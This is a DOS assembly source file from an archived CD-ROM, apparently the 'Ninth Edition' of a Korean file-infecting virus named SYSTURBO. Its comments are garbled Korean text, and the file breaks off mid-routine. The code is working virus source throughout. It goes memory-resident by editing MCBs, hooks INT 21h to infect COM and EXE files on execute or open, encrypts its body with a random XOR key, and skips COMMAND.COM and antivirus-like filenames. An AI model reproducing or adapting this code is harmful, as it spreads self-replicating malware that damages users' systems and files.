home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
HPAVC
/
HPAVC CD-ROM.iso
/
KOREACOL.ZIP
/
SYSTURBO.ZIP
/
SYSTUR2.ASM
< prev
next >
Wrap
Assembly Source File
|
1996-07-27
|
38KB
|
1,021 lines
;╖í ña╖í£ß»aôe ╡ü╕σ╡A ╨a╖í╔I OSCò╖╤í╥A╡A ╡⌐¥a╣vöσ SYSTURBO
;ña╖í£ß»a╖ü ╕≈»ó ñß╣e╖│ôíöa. ïí╣Ñ╖ü ÑA╚a ñß╣e╡A¼ß╡┴ôe ág╖í
;öaƒe ïíôw╖i êa╗íëí ╖╢»sôíöa.
;╖▒╤w╚é│íêa áeùe ╚ßÑíñé»Ñ╖e ╣A SYSTURBO ña╖í£ß»a╖ü ┤|╡A
;CALL íw¥w╖i ┴B╟a╨aößèà╢a.. ïa£ü¼ß ╖í₧ü╦Ñòí ┤⌠┤ûëí Öí.
;┤|ªüªà╖ü ┤q╤í╤┴ ╬üôe ªüªà╖ü ₧ü╦Ñ╖í ò╖╖⌐╨e ┼íùaêa ûI«ü╖╢╖aíe
;╕ΓëA ╨üæ╓»sôíöa. ëí╕≈╕Γ╖Ñ ┼íùaôe öaƒe ╬ëïaƒ▒╡A¼ßòí ¼a╢wûE
;╡üƒi ùi┤ß mov ax,cs/mov ds,ax ╖í£σ ┼íùa╖íïí╡A ñé»Ñ ╣A╣í»í
;╕a├╡ áΘ╝≈╨e ╧a¥íïa£æ╖i ╡í╠e╨i«ü ╖╢ôe ïí╥Aƒi ág╖í ║ü┤÷»sôíöa.
;╤┴╖⌐╖e 16╖a¥í ÉaÆü┤ß¼ß 7╖í Éq╖aíe êq╡q╖i ┤e╨sôíöa. óë¥Ñ
;êq╡q»í 16╖a¥í ÉaÆü┤ß¼ß 7╖í ÉqëA ╨üæ╓ïí╡A öa»í êq╡q╨aôe ╖⌐╖e
;┤⌠»sôíöa.(ÑA╚añß╣e╖e 5êa Éq╖aíe êq╡q ═íïí..)
;êq╡q╢A╡Aôe ┤aóü╖⌐òí ╨a╗í ┤g»sôíöa. öe╗í êq╡qáe ╨i¬à╖í║a....
;╕ßòí ╡ß╖Ñ╗í ííƒa╗íáe öa╟a┤ßÑE╣a»ó╖ü ¼w║ü¥íôe EMS¼w╚ü╡A¼ß
;êq╡qûE ╤┴╖⌐╖í └ß╖q »⌐╨ù»í pklite 1.03ñß╣eë┴ exepack 4.0
;ñß╣e╖a¥í ┤s┬éûE ╤┴╖⌐ë┴ ╕bò╖╖í ╕i ┤eûSôíöa. ïa£ü¼ß └ß╖q »⌐╨ù
;ûAôe êq╡qûE ╤┴╖⌐╖ü »⌐╨ù╖e ╡ü₧ü¼i¥Q╖ü ╕ü¥íù╖ ïíñ≤╖i ░÷»sôíöa.
;ëí¥í ¡í»aêa ï⌐┤ß╣v╗íáe ïí╣Ñ öa╟a┤ßÑE╣aÉa ╡ü₧ü¼i¥Q╖í EMS╡A¼ß
;╕i ╕bò╖╖í ┤eûAöσ ê⌡╖e ëí┴vöaëíÉa ╨iîa╢a..?
;¼w║ü ╡aªüôe ÑB╚ß╔A╖íºi║ù CP/M└߃í ₧ü╦Ñ╖í ╖╢ôe 8ña╖í╦a ╡w╡b╖í
;╖╢»sôíöa. ╕ßôe ╖íê⌡║ù ╨eña╖í╦aƒi ╖í╢w ╖í êt╖í 25h╖ííe ¼w║üƒi
;═íïí╨sôíöa. └qëí¥í DIR-IIòí ╖í ªüªà╖i │aôeòA ╣Aê⌡ë┴ ╢ß├íƒi
;╦iƒíëA╨ü¼ß ┬ùò⌐╖i áb┤v»sôíöa. ╖í ╧a¥íïa£æ╖ü ╦b╗╖╖e XOR¥í
;┤q╤í╤┴ ╨aôeê⌡ë┴ ┤|ë┴ ûß╖ü ╧a¥íïa£æ╖ü ï⌐╖íêa êaÑe╖í£aôe ╕±╖│ôíöa.
;ïa£ü¼ß ïí╣Ñ ╨eèé╤w ñé»Ñùi╖í ╡í╧a¡U╖ü ┤ßÿσ ña╖í£ß»aóà╕a╡i╖i └x┤a
;├í₧a╨aôe ïa£σ êeöe╨e ₧ü╦Ñ╖a¥íôe í╡├í₧a╨aëA ╨û»sôíöa.
;óë¥Ñ SYSTURBOña╖í£ß»a╡┴ ò╖╖⌐ ₧ü╦Ñ╖íôí ñé»Ñ╖e êaôw╨sôíöa.
;╨a╗íáe....
;»⌐╨ùûEôa ╤┴╖⌐║ù ╖íƒq╡A V,C,WHPôe ╧í╨ü¼ß êq╡q╨sôíöa. ñé»Ñë┴ »a─à
;ïaƒíëí COMMAND.COM(╢a¼üôe ï⌐╖íêa ñaÄßíe ªü╦╖»í ╡A£ßêa Éa¼ß...)
;áa╗íáb╖a¥í ┤a£ü┤a ╨eïi╖i ╧í╨aïí ╢ß╨eê⌡╖│ôíöa.
;ïí╣Ñ ÑA╚a╔A»a╚ßùi(OSCò╖╤í╥A ╥A╢Ñùi)╖í ┤a£ü┤a ╨eïië┴ VPIC╡A¼ß ╡A£ß
;êa Éeöaëí ╨a»Ñªàùi╖í ág╖eòA ╖í╕±╖i öa ═í╢w╨ûëí..Öí └ß╖q »⌐╨ù»í
;PACKED FILE IS CORRUPTED£aôe ╖íƒq╖í Éa╡íëí öa»í »⌐╨ù╨aíe ╕i ╕bò╖
;ûA┤÷öσ ╡A£ßòí ┤⌠┤û»sôíöa.
;╤e╕üôe ëA╖▒ ╢ß╕aùa£aôe ╧a¥íïa£æ »⌐╨ù╥ü êq╡qûE ╤┴╖⌐╖i »⌐╨ù╨aíe ╡A£ß
;êa Éa╗íáe ╣Aê⌡¬à╖í ┤aôí£a PKLITE/EXEPACK/DIET ╖í£σ ííùe ╤┴╖⌐╖í
;╡A£ßƒi Éüôeê⌡ Ñíôí ╣Aê⌡áe╖í ┤aôí£a ëA╖▒ ╢ß╕aùa╖í ╡A£ß╖Ñê⌡ ê{»sôíöa.
;╣Aêa ái╨e EMS╡A¼ß╖ü ╡A£ßòí ╤e╕ü ╡a£ßªàùi╖í ág╖í êa╗íëí ëü»Ñ ╡UÉi
;PCTOOLS4.22ñß╣eáe╖í ïa£≤ôíöa. ╖íê⌡╖í EXEPACK4.0╖a¥í ┤s┬é╖í ûA┤ß
;╖╢ôeòA ╖í ╡┴╖⌐ûß╡A óü┤⌡╖í ª¢ïíáe ╨aíe ëA╖▒ ╢ß╕aùa¼a╢w╥ü ╡A£ßêa
;ñi¼ù╨sôíöa. ïa╢A╡Aôe ╡┼╕σ╙í ╡A£ßêa ┤⌠öaëí ╕wöq╖e í╡╨a╗íáe ╣A ─±╡A¼ß
;ôe ┤a╗ó ╡A£ßƒi └x╗í í╡╨û»sôíöa.
;╣Aê⌡╡A¼σ ╡A£ßêa ┤⌠ôeòA ╡ß ╡A£ßêa ╖╢öaôeêσ╗í...
;¼a╢w╤┼ëw╖i ╕i ¡U╦╖╨aíe ╕i ╕bò╖╨sôíöa. ïaƒíëí ûI«ü╖╢╖aíe EMSíAííƒíôe
;╡⌐ƒíëí │a╗í áa¡A╢a. ïí╚a ╤┴╖⌐ùië┴ ┬ùò⌐╖í ╖╢╖i«ü ╖╢»sôíöa.
;╕≈ái╖í╡ü╢a..
;ïa╢A╖ü ╦b╖í╨e ╕±╖e ┤⌠»sôíöa. ╖⌐ñe ña╖í£ß»a╡┴ öaƒiê⌡╖í ┤⌠»sôíöa.
;öa╖qñσ╡Aôe »a╔I»a ïíñ≤╖i òí╖│╨a╡a òí»a »í╕w╖í ╢σòí╢ü╡A ╡┼╕σ╙í ú⌐ƒíïí
;╕σ╡A ╥Bïí╕Γ╖Ñ ┤a╖í╔Q╖i êa╗íëí ╕ü ┬ë╤e╨iê⌡╖i öa╗▒╨sôíöa.
;╖í ña╖í£ß»a╡A èùïq╨e╕±╖í ╖╢öaíe ëA»í╠e╡A ╗⌐óà╖í£aëí ╡⌐ƒí»íëí ╗⌐óà
;Éü╢w╖i ░ß║ü¡A╢a. ╣Aêa í⌐£ü ùi┤ß╡┴ ╖¬ëí íA╖⌐╖i ÑíÉü ùaƒíëV»sôíöa.
;óë¥Ñ ïa íA╖⌐╖i ÑíÉà ┤a╖íùíôe ╣A ┤a╖íùíêa ┤aô⌐╔Aôí ïaë╡╖a¥í íA╖⌐╖e
;ÑíÉü╗í áa»íëí╢a.
;ïa£± ╡eèü╨üÑí¡A╢a ╨eïi¥í ║ü¼Γ╖i öi┤v╖aôíîa╢a.
;╚ßÑí┤ß¡Q╖a¥í ─±╠a╖⌐ ╨û»sôíöa.
;***********************************************************
;
; Ninth Edition For Virus Source
; (ña╖í£ß»a ¡í»a ┤a╤│ñσ╝ü áaöw)
; This can be processed in EMS memory
; ( ╖í ñß╣e╖e EMS╡A¼ßòí ╕i ╕bò╖╖í ûSôíöa)
; But! Can't Infect When File Is Opend
; (╨a╗íáe ╡í╧e»í╡Aôe êq╡q╖i ┤e╨sôíöa)
;
;***********************************************************
BYTESIZE EQU (finish - start) ;╗Ñ╝a ña╖í£ß»a┼íùa
;ï⌐╖í
HEADSIZE EQU (virus_body - start) ;┤|╡A ┤q╤í╬üôeªüªà╖ü
;┼íùaï⌐╖í
PARASIZE EQU ((BYTESIZE+0Fh)/10h) ;╕σ┴A╟aïí╖ü ╠ü£ßïa£ü╧a«ü
;(¼w║ü»í ºi£Γ╟aïí ëi╕≈╢w
;╖a¥í │a╖▒)
BODYSIZE EQU (finish - virus_body) ;┤q╤í╤┴╨aôe ªüªà╖ü ╟aïí
GAJASIZE EQU 16 ;╗Ñ╝a ña╖í£ß»a ┤|╡A ª¢ôe
;16 BYTES ╟aïí╖ü │a¥Aïí
;┼íùa êò«ü
;***********************************************************
;
; INFECTED FILE'S ROUTINE ( = BATE )
;
;***********************************************************
code segment ;ña╖í£ß»a╡A êq╡qûE
assume cs:code,ds:code ;«é║ü ₧ü╦Ñ
;┤aóü╖⌐òí ┤e╨aëí
mov ah,4ch ;òí»a¥í Éaêq
int 21h
code ends
;***********************************************************
;
; ORIGINAL VIRUS ROUTINE ;╡aïí¼ß ªü╚ß ╗Ñ╝a
; ;ña╖í£ß»a ₧ü╦Ñ
;***********************************************************
main segment
assume cs:main,ds:main
jumps ;╚ßÑí┤ß¡Qáe╖ü ╕±╧a┼íùa ╨eëüƒi
;¼wë┼┤e╨aëí ─±╠a╖⌐╨i«ü ╖╢ôe
start: ;╡ü┤ó┤ß
push cs
pop ds
si_value: mov si,offset virus_body ;└ß╖q ╧a¥íïa£æ╖ü »í╕b offset╖i
;╖│¥b ñhôeöa (êq╡q»í ┤i┤a¼ß ëü¼e)
mov cx,BODYSIZE ;┤q╤íƒi ╬ë í▒┴A ╟aïí╖ü 1/2
mov bx,es
di_value: mov di,offset virus_body ;╢ß╡┴ ò╖╖⌐, ╡aïí¼ß SIôe
;¼wöüñσ╗í ñw»ó╖i ╢ß╨ü │a╖Ñöa
push cs ;(COM ë┴ EXE╖ü »í╕b offset╖í
pop es ;╦i¥a╗íôe ╖í╖A¥í..)
cld
lodsb ;xor¥í öe«à ┤q╤í╤┴
key_value: xor al,00h ;┤q╤í╖ü ╟íêt╖e êq╡q»í ┤i┤a¼ß
stosb ;╖íë╡╡A │a╖Ñöa
loop move_loop
virus_body:
mov si,0000h ;└ß╖q ╧a¥íïa£æ╖ü »í╕b offset ╖│¥b
;êq╡q»í ╕aò╖ ╖│¥b
check_mem:
mov PSP_SEG[si],bx ;╧a¥íïa£æ PSP ¡Aïaáσ╦a ╕ß╕w
mov bx,ds
xor ax,ax
mov ds,ax
mov ah,byte ptr ds:[0c0h] ;ña╖í£ß»a ¼w║ü
cmp ah,25h ;╡aªü ëi╕≈
jz exe_routine
make_tsr:
mov ds,bx
mov ax,PSP_SEG[si]
dec ax
mov es,ax
;MCB ╡A¼ß ╨iöwûE ╠ü£ßïa£ü╧a
mov ax,es:[03h] ;«üƒi ╖¬┤ß¼ß ╕ß╕w╨eöa.
mov ORG_PARA[si],ax ;(¼w║ü╥ü ╠ü£ßïa£ü╧a Ñóèß)
mov es,PSP_SEG[si]
mov bx,0ffffh ;┬Aöü¥í ╖A╢w╨e íAííƒí╖ü
mov ah,4ah ;╟aïíƒi ┤Φôeöa
int 21h ;ªëêaôw╨e ╟aïíƒi ║ü┤ß
jnc exe_routine ;ƒí╚σûE êt╖a¥í ëi╕≈
mov ah,4ah ;ña╖í£ß»a ╟aïíáe╟q ╟aïíƒi
sub bx,(PARASIZE+3)*2 ;║ë╖íëí ╕ü ╨iöw
jc exe_routine
int 21h
mov ah,48h ;ña╖í£ß»a ÑÑ┴Aƒi ╢ß╨e
mov bx,PARASIZE ;╨iöw
int 21h
mov VIRUS_SEG[si],ax
mov ah,48h ;¼w║ü»í ╤┴╖⌐│aïí ╕b┤≤╖i
mov bx,PARASIZE+3 ;╢ß╨e òA╖í╚ß ╡w╡b ╨iöw
int 21h
mov SPACE_SEG[si],ax
mov ax,VIRUS_SEG[si] ;êw╣A¥í MCBƒi ëí┴a »í»a╔Q
dec ax ;╤┴╖⌐╖ÑÉ╖ ¡ó╖Ñöa
mov es,ax
mov word ptr es:[01h],08h ;MCB offset 1 ╖í 08╖ííe
;»í»a╔Q ╡w╡b╖í£a ╡í╠e╨aëí
;òí»aêa íAííƒí ┤e╥A«ü
mov ax,SPACE_SEG[si] ;╢ß╡┴ ò╖╖⌐
dec ax
mov es,ax
mov word ptr es:[01h],08h
mov es,VIRUS_SEG[si]
push si
xor di,di ;ña╖í£ß»aƒi ╨iöw╨e ╡w╡b╖a¥í
mov cx,BYTESIZE ;╖íò╖»í╟Ñöa
cld
rep movsb
pop si
mov es,PSP_SEG[si]
mov bx,ORG_PARA[si] ;╢Ñ£ü╖ü ╠ü£ßïa£ü╧a«ü¥í ╨iöw
mov ah,4ah ;╨ü║ü┤ß ╢Ñ╨ü¼w╚ü╡┴ ê{╖e íAííƒí
int 21h ;╤┼ëw╖a¥í áeùeöa
chng_21:
mov ax,VIRUS_SEG[si] ;╖Ñ╚ߣ≤╦a 21hñσ
mov es,ax ;êa¥í└üïí ₧ü╦Ñ
xor ax,ax
mov ds,ax
mov ax,word ptr ds:[084h]
mov es:INT21_OFF,ax
mov ax,word ptr ds:[086h]
mov es:INT21_SEG,ax
cli
mov word ptr ds:[84h],offset int_21h
mov word ptr ds:[86h],es
sti
carve_marker:
mov ah,25h ;ña╖í£ß»a ¼w║ü ╡aªüƒi
mov byte ptr ds:[0c0h],ah ;╢ß╨e CP/MÑB╚߃i áa─ß
;òA╖í╚ߥí ╖í╢w
jmp_execute: ;¼w║ü»í╟íëíÉa¼ßôe
;╖í₧ü╦Ñ╖i ╖í╢w ╤┴╖⌐╖i
mov ax,es ;╕ü ¥íù╖, »⌐╨ù»í╟Ñöa
push ax
mov ax,offset sub_execute
push ax
retf ;¼w║üûA┤ß ╖╢ôe ªüªà╖a¥í ╕±╧a
;ëièé ú╗╖ü ₧ü╦Ñ╖a¥í ╕±╧a╨eöa
sub_execute:
cli
mov ax,cs ;»a╚é ╕ü╣í╕≈
mov ds,ax
mov ss,ax
mov sp,offset STACK_SPACE + 62
sti
mov es,PSP_SEG
mov word ptr ENV_BLOCK[00h],00 ;╤┴╖⌐ »⌐╨ù╖i ╢ß╨e
mov word ptr ENV_BLOCK[02h],80h ;╤┼ëw ºi£Γ╖ü ╕ü ¼Θ╕≈
mov word ptr ENV_BLOCK[04h],es
mov word ptr ENV_BLOCK[06h],5ch
mov word ptr ENV_BLOCK[08h],00
mov word ptr ENV_BLOCK[0ah],6ch
mov word ptr ENV_BLOCK[0ch],es
mov ah,4ah ;íAííƒíƒi PSPÉqïíëí
mov bx,10h ;öa ╨ü╣A
int 21h
mov es,es:[2ch] ;╤┼ëw ºi£Γ╡A¼ß
xor di,di ;╤┴╖⌐╖ü ╖íƒq╖i ┤Φôeöa
mov cx,7fffh
xor al,al
cld
search_loop: repnz scasb
cmp es:[di],al
loopnz search_loop
mov dx,di ;╖Ñ╚ߣ≤╦a 4bhƒi ╖í╢w╨ü¼ß
add dx,3 ;╤e╕ü╖ü ╤┴╖⌐╖i ╕ü »⌐╨ù╨eöa
mov ax,4b00h
push es
pop ds
push cs
pop es
mov bx,offset ENV_BLOCK
pushf
call dword ptr cs:INT21_OFF
mov es,cs:PSP_SEG ;Éq┤a╖╢öσ PSP╨ü╣A
mov ah,49h
int 21h
mov ah,4dh ;╨a╢ß └߃í₧ü╦Ñ╖ü └߃í┼íùaƒi
int 21h ;┤Φôeöa
mov ah,4ch ;╧a¥íïa£æ ╣╖₧a
int 21h
exe_routine: ;¼w║üûA┤ß ╖╢╖i»í ╖íë╡╖a¥í
;╕±╧a ╨eöa
cmp cs:FILE_TYPE[si],0 ;╤┴╖⌐ ╚a╖│╖í 0╖ííe COM╤┴╖⌐
jz com_routine ;1╖ííe EXE╤┴╖⌐
mov ax,cs:PSP_SEG[si] ;╡íƒí╗íÉi ╤┴╖⌐ ₧ü╦Ñ╖a¥í ╕±╧a╨aïí
mov es,ax ;╢ß╨ü ¡Aïaáσ╦aùi╖i ëü¼e╨ü║àöa
mov ds,ax
add ax,0010h
add cs:EXE_CS[si],ax
add cs:EXE_SS[si],ax
cli
mov ss,cs:EXE_SS[si]
mov sp,cs:EXE_SP[si]
sti
xor ax,ax ;ìó »⌐╨ù»í ax,bxôe 0 ╖í┤ß┤í ╨eöa
xor bx,bx ;┤eïa£ßíe diskcopy.com ê{╖í ûß╡A
;╖Ñ╕aƒi │aôe ╧a¥íïa£æ╖í ╕i ╕bò╖
;┤e╨eöa
jmp dword ptr cs:EXE_IP[si] ;╢Ñ£ü ┼íùa¥í ╕±╧a
com_routine:
mov ax,cs
mov ds,ax
mov es,ax
mov COM_CS[si],ax
mov bx,si
mov ax,offset EXE_HEADER ;╤┴╖⌐╖ü ┤| ╤Aö߃i ╢Ñ£üöü¥í
add si,ax ;ëí├Ñöa(íAííƒí¼w╡A¼ßáe ëí├íïí
mov di,100h ;ÿüóà╡A ╤┴╖⌐╨aëíáe ¼wë┼┤⌠╖q)
cld
movsb
movsw
mov si,bx
xor ax,ax
xor bx,bx
jmp dword ptr COM_IP[si] ;╢Ñ£ü COM╤┴╖⌐╖ü ₧ü╦Ñ╖a¥í
;╕±╧a
int_24h: ;╡A£ß└߃í ╖Ñ╚A£≤╦aƒi
xor al,al ;êa¥í└àöa
iret ;êq╡q»í ¼a╢w
int_21h:
;¼ü¥í╖e 21hñσ ₧ü╦Ñ
pushf
cmp ax,4b00h ;»⌐╨ù╖Ñêa?
jz gariginal
cmp ah,3dh
jz gariginal
original: ;╢Ñ£ü╖ü ╖Ñ╚ߣ≤╦a¥í ╕±╧a
popf
jmp dword ptr cs:INT21_OFF
gariginal:
;ds:dx=file name
push ax ;ííùe ¥A╗í»a╚ß öü╧í
push bx
push cx
push dx
push ds
push es
push si
push di ;╤┴╖⌐╖íƒq╖i ╕ß╕w╨eöa
mov word ptr cs:FILE_NAME[00h],dx
mov word ptr cs:FILE_NAME[02h],ds
get_drive:
cld ;ùa£a╖íºa íw╖i ┤Φôaöa
mov di,dx
xor dl,dl
cmp byte ptr [di+01],3ah
jnz chk_capacity
mov dl,[di]
and dl,1fh
chk_capacity:
mov ah,36h ;ña╖í£ß»aêa │a╡a╗⌐ ╟aïí
int 21h ;áe╟q╖ü ╡a╖A ë╖êe╖í ╖╢Éa?
cmp ax,0ffffh ;╤┬╖Ñ
jz return_back2
mul bx
mul cx
or dx,dx
jnz capacity_ok ;┬A¡í ña╖í£ß»aÑíöa 2ñü╖í¼w╖ü
cmp ax,BYTESIZE*2 ;╡a╖A╡w╡b╖í ╖╢┤ß┤í êq╡q
jb return_back2
capacity_ok:
mov dx,word ptr cs:FILE_NAME[00h]
mov ax,word ptr cs:FILE_NAME[02h]
mov ds,ax
mov si,ds
xor ax,ax
mov ds,ax
les ax,dword ptr ds:[90h] ;╖Ñ╚ߣ≤╦a 24hñσ ñaÄæ
mov word ptr cs:INT24_OFF,ax
mov word ptr cs:INT24_SEG,es
cli
mov word ptr ds:[90h],offset int_24h
mov word ptr ds:[92h],cs
sti
mov ds,si ;ds:dx=file name
xor cx,cx
mov ax,4300h ;╤┴╖⌐ ¡ó¼≈╖i ┤Φôeöa
pushf
call dword ptr cs:INT21_OFF ;cx╡A ╤┴╖⌐ ¡ó¼≈ ƒí╚σ
mov bx,cx
and cl,0feh
cmp cl,bl
je infect_start
mov ax,4301h ;¡ó¼≈╖í │aïí┤eûAôeêßíe
pushf ;¡ó¼≈╖i Ñe╤┼
call dword ptr cs:INT21_OFF
jc return_back1
infect_start:
push ds
push dx
push bx
mov ax,3d02h ;╤┴╖⌐ ╡í╧e
pushf
call dword ptr cs:INT21_OFF
jc open_error
mov bx,ax ;ax ╡A ╨àùi╖í ƒí╚σ
mov cs:FILE_HANDLE,ax
call read_handle ;ÑÑëb ña╖⌐£ß»a └߃í₧ü╦Ñ╖a¥í!
mov bx,cs:FILE_HANDLE
mov ah,3eh ;bx ╡A ╨àùiêt╖i ╕ß╕w
pushf
call dword ptr cs:INT21_OFF
;╤┴╖⌐ ╟i¥í╗a
open_error:
pop cx ;╣▒╕σ╡A bx╡A ╨àùi╖i ╬ü«ß╨ûïí╡A
pop dx ;╖íñσ╡Aôe cx¥í ñh╖q
pop ds ;ëí¥í cxêa ╨àùiêt╖i êxëí ╖╢öa
mov ax,4301h
pushf
call dword ptr cs:INT21_OFF
;╢Ñ£ü ╤┴╖⌐╖ü ¡ó¼≈╖a¥í
;ûAò⌐¥a ║àöa
return_back1:
xor ax,ax
mov ds,ax
cli
mov ax,cs:INT24_OFF
mov word ptr ds:[90h],ax ; 24hñσ ╖Ñ╚ߣ≤╦aƒi
mov ax,cs:INT24_SEG ;ò⌐¥a║àöa
mov word ptr ds:[92h],ax
sti
return_back2:
pop di ;¥A╗í»a╚ß Ñóèß
pop si
pop es
pop ds
pop dx
pop cx
pop bx
pop ax
popf ;ùaùí┤ß ╢Ñ£ü ╖Ñ╚ߣ≤╦a¥í..
jmp dword ptr cs:INT21_OFF
;***********************************************************
;
; HANDLE READ ROUTINE
;
; (ÑÑëb╕Γ╖Ñ ña╖í£ß»a êq╡q ₧ü╦Ñ╖e ╖í ┤e╡A)
;
;
;***********************************************************
read_handle proc near
mov ax,4200h
xor cx,cx
xor dx,dx
pushf
call dword ptr cs:INT21_OFF
jc int_error1
mov ax,cs ;EXE_HEADER£aôe òA╖í╚ß
mov ds,ax ;ñß╠ß╡A ╤┴╖⌐ ¼σûü╡A¼ß 3cháe╟q
mov es,ax ;╖¬┤ß╡Ñöa
mov dx,offset EXE_HEADER ;COM/EXEèüÑi┤e╨eöa
mov cx,40h
mov ah,3fh
pushf
call dword ptr cs:INT21_OFF
jc int_error1
xor cx,cx ;╤┴╖⌐╖ü »⌐╗í ï⌐╖íƒi
xor dx,dx ;┤Φ┤ß ╕ß╕w╨eöa
mov ax,4202h
pushf
call dword ptr cs:INT21_OFF
mov word ptr FILE_SIZE[00],ax
mov word ptr FILE_SIZE[02],dx
cmp ax,BYTESIZE ;ña╖í£ß»aÑíöa ╕b╖e ╤┴╖⌐╖e
ja check_infect ;êq╡q╖i ═íïí╨aëí
cmp dx,0 ;RETURN ╨eöa
je int_error1
check_infect:
;╤┴╖⌐ ï⌐╖íêa 16╖a¥í ÉaÆü┤ß
and ax,000fh ;7 Éq╖aíe êq╡q╖i ┤e╨eöa
cmp ax,0007
jz int_error1
check_exe:
cmp word ptr EXE_HEADER,5a4dh ;╤Aößêa EXE┼íùa ╖Ñêa?
jne check_com ;╤┬╖Ñ╨eöa
mov dx,word ptr EXE_HEADER[3ch] ;╢σòí╢ü ╤┴╖⌐╖ü ╨üößêa
mov cx,word ptr EXE_HEADER[3ch+2];╖╢ôeë╡╖a¥í Üσöa
mov ax,4200h
pushf
call dword ptr cs:INT21_OFF
mov cx,2 ;╢σòí╢ü ╤Aößêa ╣Ñ╕ü╨aÉa
mov dx,offset MARKER ;╤┬╖Ñ╨aïí ╢ß╨ü 2ña╖í╦aƒi
mov ah,3fh ;╖¬┤ß╡Ñöa
pushf
call dword ptr cs:INT21_OFF
cmp word ptr MARKER,454eh ;╢σòí╢ü ╤┴╖⌐╖Ñêa?
jz int_error1 ;áx╖aíe êq╡q ═íïí
mov ax,word ptr EXE_HEADER[04h] ;EXE ╤┴╖⌐╖ü ╕≈Ñí¥í
cmp word ptr EXE_HEADER[02h],00 ;╤┴╖⌐╖ü ╟aïíƒi ┤i┤aÉàöa
jz no_dec
dec ax
no_dec:
mul SECTOR ;dx:ax=╤┴╖⌐ ╟aïí
add ax,word ptr EXE_HEADER[02h] ;╡íñߥA╖í ╤┴╖⌐╖Ñêa
adc dx,00h ;╤┬╖Ñ╨eöa
cmp word ptr FILE_SIZE[00h],ax ;╡íñߥA╖ííe êq╡q╖i
jnz int_error1 ;═íïí╨eöa
cmp word ptr FILE_SIZE[02h],dx ;└qëí:╤Aöß╖ü ╤┴╖⌐╟aïí╕≈Ñí
jnz int_error1 ;╡┴ ╢Ñ£ü╖ü ╤┴╖⌐╟aïíêa
;╦iƒííe ╡íñߥA╖íöa
exe_ok:
mov FILE_TYPE,1 ;EXE╤┴╖⌐╖í£aôe ╬a»í
jmp write_virus
check_com:
cmp byte ptr EXE_HEADER,0e9h ;╕±╧a┼íùa¥í »í╕b╨aôe
je check_com_size ;╤┴╖⌐╖Ñêa ╤┬╖Ñ╨eöa
cmp byte ptr EXE_HEADER,0ebh
jne int_error1
check_com_size:
cmp word ptr FILE_SIZE[00h],0f060h
jnb int_error1 ;61536ña╖í╦aÑíöa ╕b╖aíe
;êq╡q╖i ┤e╨eöa
mov FILE_TYPE,0 ;COM╤┴╖⌐╖í£aôe ╬a»í
write_virus:
lds si,cs:FILE_NAME
xor cx,cx
capitalize:
;╤┴╖⌐íw╖i öa öüóà╕a╤┴ ╨eöa
inc cx
mov al,[si]
or al,al
jz check_slash
cmp al,61h
jb inc_si
cmp al,7ah
ja inc_si
sub byte ptr [si],20h
inc_si:
inc si
jmp capitalize
check_slash: ;╤┴╖⌐ ╖íƒq╖ü áà ┤| ═í╖Ñ╚߃i
;┤Φïí╢ß╨ü ╡b»i£ü«ßîa╗í
;»a─à╨eöa
mov al,[si]
cmp al,'\'
jz find_pointer
cmp al,':'
jz find_pointer
dec si
loop check_slash
find_pointer:
inc si
mov cs:FILE_NAME_START,si ;╤┴╖⌐ »í╕b╕± ═í╖Ñ╚߃i ┤Φôeöa
cld
check_target1:
mov ax,cs
mov es,ax
mov di,offset TARGET_FILE1 ;╤┴╖⌐╖í COMMAND.COM ╖Ñêa?
mov cx,4
repz cmpsb
jnz check_target2
jmp int_error1
check_target2:
mov si,cs:FILE_NAME_START
loop_scan:
mov ax,word ptr ds:[si] ;óà╕a╡i║ù╡A SC╖í£aôe ïi│íêa
cmp ax,'CS' ;╣Ñ╕ü╨aôeêa?
jz int_error1
mov al,ds:[si+1]
cmp al,'.'
jz check_target3
inc si
jmp loop_scan
check_target3:
mov si,cs:FILE_NAME_START
loop_ndos:
mov ax,word ptr ds:[si] ;óà╕a╡i║ù╡A SC╖í£aôe ïi│íêa
cmp ax,'SO' ;╣Ñ╕ü╨aôeêa?
jz int_error1
mov al,ds:[si+1]
cmp al,'.'
jz check_target4
inc si
jmp loop_ndos
check_target4:
mov si,cs:FILE_NAME_START
loop_character:
mov al,ds:[si] ;óà╕a║ù╡A V £aôe ╖íƒq╖í
cmp al,'V' ;╖╢Éa?
jz int_error1
cmp al,'H'
jz int_error1
cmp al,'I'
jz int_error1
mov al,ds:[si+1]
cmp al,'.'
jz virus_process
inc si
jmp loop_character
virus_process:
mov ax,cs
mov ds,ax
mov ax,40h ;ña╖í╡í»a òA╖í╚ß ╡w╡b╡A¼ß
mov es,ax ;£àö±╨e êt╖i ┤Φôeöa
mov ax,word ptr es:[6ch]
mov byte ptr key_value[01h],al ;┤q╤í╤┴ ╨aïí╢ß╨e ╟íêt╖i
and ax,000fh ;╗ó╕≤ ┤q╤í╬üôe ₧ü╦Ñ╡A │eöa
mov RANDOM,ax ;│a¥Aïí ┼íùaƒi ┤Θáaáe╟q
;ª¢╖⌐êσ╗í ëi╕≈╨eöa
add ax,BYTESIZE
mov ALL_BYTE,ax
add ALL_BYTE,GAJASIZE
mov cx,word ptr FILE_SIZE[02h]
mov dx,word ptr FILE_SIZE[00h]
and dx,000fh ;╤┴╖⌐ ¼a╖í╗aƒi 16╖a¥í
add ALL_BYTE,000fh ;ÉaÆü┤ß¼ß 7╖í ÉqëA ╣í╕≈
and ALL_BYTE,0fff0h ;╨eöa
add ALL_BYTE,7
sub ALL_BYTE,dx
mov ax,5700h ;╤┴╖⌐ Éi╝aƒi ┤Φôeöa
pushf
call dword ptr cs:INT21_OFF
mov FILE_DATE,dx
mov FILE_TIME,cx
cmp FILE_TYPE,1 ;╤┴╖⌐╖ü ╣╖ƒA¥í └߃í₧ü╦Ñ ëi╕≈
jz exe_process
cmp FILE_TYPE,0
jz com_process
jmp int_error1
exe_process:
mov ax,word ptr EXE_HEADER[0eh] ;EXE ╨üöß╖ü ╕≈Ñíƒi
mov EXE_SS,ax ;╕ß╕w╨eöa
mov ax,word ptr EXE_HEADER[10h]
mov EXE_SP,ax
mov ax,word ptr EXE_HEADER[14h]
mov EXE_IP,ax
mov ax,word ptr EXE_HEADER[16h]
mov EXE_CS,ax
mov ax,word ptr EXE_HEADER[04h]
cmp word ptr EXE_HEADER[02h],00
jz no_dec2
dec ax
no_dec2:
mul SECTOR
add ax,word ptr EXE_HEADER[02h]
adc dx,00
mov START_POINT2,ax
mov START_POINT1,dx
add ax,ALL_BYTE
adc dx,00
jc int_error1
div SECTOR
cmp ax,0400h
jae int_error1
cmp dx,0
jz no_inc
inc ax
